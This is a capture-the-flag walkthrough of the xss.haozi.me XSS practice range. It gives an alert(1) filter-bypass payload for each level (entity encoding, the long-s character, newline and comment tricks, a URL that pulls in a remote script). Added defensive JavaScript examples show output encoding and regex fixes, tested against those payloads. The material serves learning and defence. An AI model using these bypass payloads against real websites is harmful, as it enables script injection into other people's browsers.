XSS range (II): xss.haozi
2022-07-29 02:33:00 【The tree lost its way】
Target address: https://xss.haozi.me
0x00
No protection at all:
<script>alert(1)</script>
0x01
The input lands inside a <textarea> element. Everything inside that element is treated as text, so no script can run there; close the element first:
</textarea><script>alert(1)</script>
0x02
The input sits inside a double-quoted attribute value; closing the " and then the tag with > is enough:
"><script>alert(1)</script>
aaa" onclick="alert(1)
0x03
A regular expression replaces ( ) with nothing; call alert through a tagged template literal with backticks instead:
<script>alert`1`</script>
0x04
The regular expression now strips both ( ) and ``; HTML-entity-encode the parentheses instead. The <svg> wrapper matters: character references are decoded inside a <script> in SVG content, but not inside an ordinary HTML <script>:
<svg><script>alert&#40;1&#41;</script>
0x05
Here the regular expression replaces -->. An HTML comment can be closed in two ways: the usual <!-- comment --> and the alternative <!-- comment --!>, so:
--!><script>alert(1)</script>
0x06
The regular expression here replaces auto, on.*= and the > character, so the autofocus attribute and every on* event handler are filtered.
Newlines, however, are not filtered. HTML is fault-tolerant here: as long as the keywords and syntax are correct, whitespace and newlines between an attribute name and its = make no difference, while the . in the regular expression does not match a newline:
onclick
=alert(1)
onmousedown
=alert(1)
type=image src=1 onerror
=alert(1)
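An added example, not from the write-up or from xss.haozi.me, showing the regular-expression detail behind 0x06: in JavaScript a . does not match a line terminator unless the s (dotAll) flag is set, so a pattern like on.*= cannot see an = on the following line. The WEAK pattern below is a reconstruction of the filter as the write-up describes it (an assumption, not the site's source), and FIXED is the same intent with dotAll enabled. Even the corrected pattern is only a blacklist; the real fix for an attribute context is to quote and entity-encode the value rather than to pattern-match it.

```javascript
// Added example (not code from the write-up or the site).
// The weak pattern is reconstructed from the write-up's description: an assumption.
const WEAK = /auto|on.*=|>/ig;
// Same intent with the 's' (dotAll) flag, so '.' also matches '\n'.
// Equivalent without the flag: /auto|on[\s\S]*=|>/ig
const FIXED = /auto|on.*=|>/igs;

// Payload from the write-up: the event name and its '=' are split by a newline.
const SPLIT = 'type=image src=1 onerror\n=alert(1)';

// Apply a filter the way the write-up describes it: matches replaced by '_'.
function filteredBy(re, input) {
  return input.replace(re, '_');
}

// Detection check: does an 'on...=' handler (allowing whitespace before '=')
// survive the filter? True means the filter failed.
function handlerSurvives(filtered) {
  return /on[a-z]+\s*=/i.test(filtered);
}

// Compare both patterns on the split payload.
function compare() {
  return {
    weak: handlerSurvives(filteredBy(WEAK, SPLIT)),   // true: handler still present
    fixed: handlerSurvives(filteredBy(FIXED, SPLIT)), // false: 'onerror\n=' was removed
  };
}
```

Run with node; compare() returns { weak: true, fixed: false }, and filteredBy(FIXED, SPLIT) yields type=image src=1 _alert(1).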
0x07
The regular expression <\/?[^>]+> matches a whole tag: a < followed by a run of non-> characters and a closing >, case-insensitively. In effect it replaces every <...> and </...> with nothing. Use an <svg> tag together with HTML's fault tolerance and simply leave out the >, so the pattern never matches:
<svg onload=alert(1)//
<svg onload=alert(1)\n
<img src=1 onerror="alert(1)"
0x08
The regular expression filters </style>, so the element cannot be closed that way.
As in 0x06 and 0x07, rely on HTML's fault tolerance: follow </style with a space or a newline instead of writing </style> directly:
</style ><script>alert(1)</script>
</style
><script>alert(1)</script>
0x09
A regular expression requires the input to start with https://www.segmentfault.com1.
After that prefix, close the attribute with " and the element with ></script>, then comment out the trailing "> with //:
https://www.segmentfault.com1"></script><script>alert(1)//
0x0A
Similar to the previous challenge, but ' " < > / are all filtered.
Put an @ in the middle of the URL: the browser treats everything before the @ as user info and requests the host that follows it. (Google Chrome seems to have a protection mechanism here; try it in Firefox.)
https://www.segmentfault.com@xss.haozi.me/j.js
0x0B
All input is converted to upper case.
HTML is case-insensitive, JavaScript is case-sensitive.
Use <svg onload=...> and HTML-entity-encode alert: numeric character references survive the upper-casing and are decoded back to lower-case letters by the browser:
<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>
0x0C
Like the previous challenge, with one extra filter that removes the string script.
The svg payload still works; to use <script>, write the keyword doubled, so that removing the inner script leaves the outer one intact:
<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>
<sscriptcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></sscriptcript>
0x0D
The regular expression filters < / " ', so none of those can be used.
The input lands inside a single-line JavaScript comment: press Enter to get out of the comment, then hide the trailing ') behind another comment. Inside a <script>, a line that starts with --> is treated as a single-line comment (an HTML-like comment), so the payload is a newline first, then:
alert(1)
-->
0x0E
The regular expression here matches <[a-zA-Z], inserts _ after the <, and upper-cases the result, which filters almost every tag.
So a special trick is needed: the character ſ (Latin small letter long s) is upper-cased to S:
<ſcript src=1 onerror=alert(1)></script>
<ſvg onload=alert(1)>
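An added example, not code from the write-up or from xss.haozi.me, covering the HTML contexts of 0x00 to 0x0E (text node, textarea, attribute value, comment, tag). All of those filters delete characters or keywords, and every bypass above works because something survives deletion. The alternative is to encode every character that can change the tokenizer's state, so that a < emitted as &#60; never opens a tag no matter what follows it (case changes, doubled keywords, the long s, a newline instead of >). The render functions below are reconstructions of the contexts the write-up describes, an assumption rather than the site's own code; the payloads are the ones quoted above, reused as regression inputs.

```javascript
// Added example (not the write-up's or the site's code): context-aware output
// encoding for HTML text and attribute contexts. The templates are assumptions.

// Encode every character that can change the HTML tokenizer's state.
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Attribute values: same encoder, and the value is always double-quoted so that
// whitespace (the 0x06 newline) stays inside the value instead of starting a new attribute.
function renderAttribute(name, value) {
  return `${name}="${encodeForHtml(value)}"`;
}

// Hardened versions of the reconstructed contexts.
function renderTextNode(input) { return `<div>${encodeForHtml(input)}</div>`; }
function renderTextarea(input) { return `<textarea>${encodeForHtml(input)}</textarea>`; }
function renderInput(input) { return `<input ${renderAttribute('value', input)}>`; }
// Character references are not decoded inside HTML comments (0x05), so there is no
// encoder for that context: user input must never be written into a comment at all.

// Counts tag openers ('<' followed by a letter, '/' or '!') in rendered markup,
// so each template can be checked for emitting exactly its own tags.
function countTagOpeners(html) {
  return (html.match(/<[a-zA-Z/!]/g) || []).length;
}

// Payloads quoted in the write-up above, reused as regression inputs.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '</textarea><script>alert(1)</script>',
  '"><script>alert(1)</script>',
  'aaa" onclick="alert(1)',
  '<script>alert`1`</script>',
  '<svg><script>alert&#40;1&#41;</script>',
  '--!><script>alert(1)</script>',
  'type=image src=1 onerror\n=alert(1)',
  '<svg onload=alert(1)//',
  '</style ><script>alert(1)</script>',
  '<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>',
  '<sscriptcript src=1 onerror=alert(1)></sscriptcript>',
  '<\u017Fcript src=1 onerror=alert(1)></script>',
];

// True when every payload leaves each template with only the template's own tags
// and leaves the attribute value inside its quotes.
function allInert() {
  return PAYLOADS.every((p) =>
    countTagOpeners(renderTextNode(p)) === 2 &&
    countTagOpeners(renderTextarea(p)) === 2 &&
    countTagOpeners(renderInput(p)) === 1 &&
    !/["<>]/.test(encodeForHtml(p)));
}
```

Note that & is encoded too, so the entity-based payloads of 0x04 and 0x0B come out as &#38;#97; and are displayed literally rather than decoded; allInert() returns true for the whole list.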
0x0F
Similar to 0x0A: & ' " < > / are HTML-entity encoded.
The catch is that the input still sits in HTML (an attribute whose value is JavaScript), and the browser decodes the entities before the JavaScript runs, so the characters keep their meaning despite the encoding.
Close the surrounding (' ') on both sides, or comment the rest out:
');alert(1);('
0x10
No protection; the input is simply assigned as the value of data:
');alert(1);('
0x11
Same as 0x0F, but / ' " ` < > \ and newlines are backslash-escaped;
closing the surrounding (" ") on both sides is enough.
Escaping / inside JavaScript code is actually superfluous: in practice / is not a special character there, needs no escaping, and can be output directly.
");alert(1);("
");alert(1);//
0x12
" is escaped with a backslash.
There is no need for a double quote at all: close the preceding <script> directly, then comment out the trailing ') with //.
Alternatively, use \ to escape the escaping backslash so that it no longer protects the quote, then close with ":
</script><script>alert(1)//
a\");alert(1);//
OK, done! Habits differ and the answers are not unique; if you have other solutions, feel free to share!
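An added example, not code from the write-up or from xss.haozi.me, for the JavaScript-string contexts of 0x0F to 0x12. The write-up's point is that each of those filters encodes for the wrong layer or leaves one character unescaped: 0x0F applies HTML encoding that the browser undoes before the script runs, 0x11 escapes characters that do not matter, and 0x12 leaves the backslash and the < unescaped. The encoder below takes the opposite approach: inside a JavaScript string literal, every character outside [A-Za-z0-9] becomes a \uXXXX escape, so no quote, backslash, slash, < or newline can ever appear in the output. For an inline event handler the value is then also HTML-attribute-encoded, inside-out (JavaScript layer first, HTML layer second). The render functions are reconstructions of the contexts the write-up describes (an assumption, not the site's code), and the payloads are the ones quoted above.

```javascript
// Added example (not the write-up's or the site's code). Templates are assumptions.

// JavaScript-string layer: every character outside [A-Za-z0-9] becomes \uXXXX.
// Surrogate halves are escaped one at a time, which is valid in a JS string literal.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// HTML-attribute layer for inline handlers. The browser decodes entities in the
// attribute before the JS engine sees it (the 0x0F lesson), so this layer wraps the
// JS-encoded value; on its own it protects nothing.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Hardened version of an 0x0F-style inline handler (template is an assumption).
function renderInlineHandler(input) {
  return `<img src onerror="console.log('${encodeForHtmlAttribute(encodeForJsString(input))}')">`;
}

// Hardened version of an 0x10/0x12-style script block (template is an assumption).
function renderScriptBlock(input) {
  return `<script>window.data = '${encodeForJsString(input)}'</script>`;
}

// Tiny stand-in for the browser's attribute-value decoding (numeric references only).
function decodeNumericEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
}

// Round trip for the inline handler: decode the attribute as the browser would, take
// the string literal out of console.log('...'), and evaluate its escapes. JSON.parse is
// used because \uXXXX means the same thing in JSON and in a JS string literal.
function roundTrip(input) {
  const attr = renderInlineHandler(input).match(/onerror="([^"]*)"/)[1];
  const js = decodeNumericEntities(attr);
  const literal = js.slice("console.log('".length, -"')".length);
  return JSON.parse(`"${literal}"`);
}

// Payloads quoted in the write-up for 0x0F to 0x12, reused as regression inputs.
const PAYLOADS = [
  "');alert(1);('",
  '");alert(1);("',
  '");alert(1);//',
  '</script><script>alert(1)//',
  'a\\");alert(1);//',
];

// True when every payload survives the round trip unchanged as data, cannot smuggle a
// closing </script> into the block, and leaves no quote, backslash, slash or < outside
// the \uXXXX escapes.
function allRoundTrip() {
  return PAYLOADS.every((p) =>
    roundTrip(p) === p &&
    !renderScriptBlock(p).includes('</script><') &&
    !/[\\"'<\/]/.test(encodeForJsString(p).replace(/\\u[0-9a-f]{4}/g, '')));
}
```

A newline is encoded as \u000a as well, which is why this encoder also removes the raw-newline trick of 0x0D, although user input should not be written into a comment in the first place. allRoundTrip() returns true for the whole list.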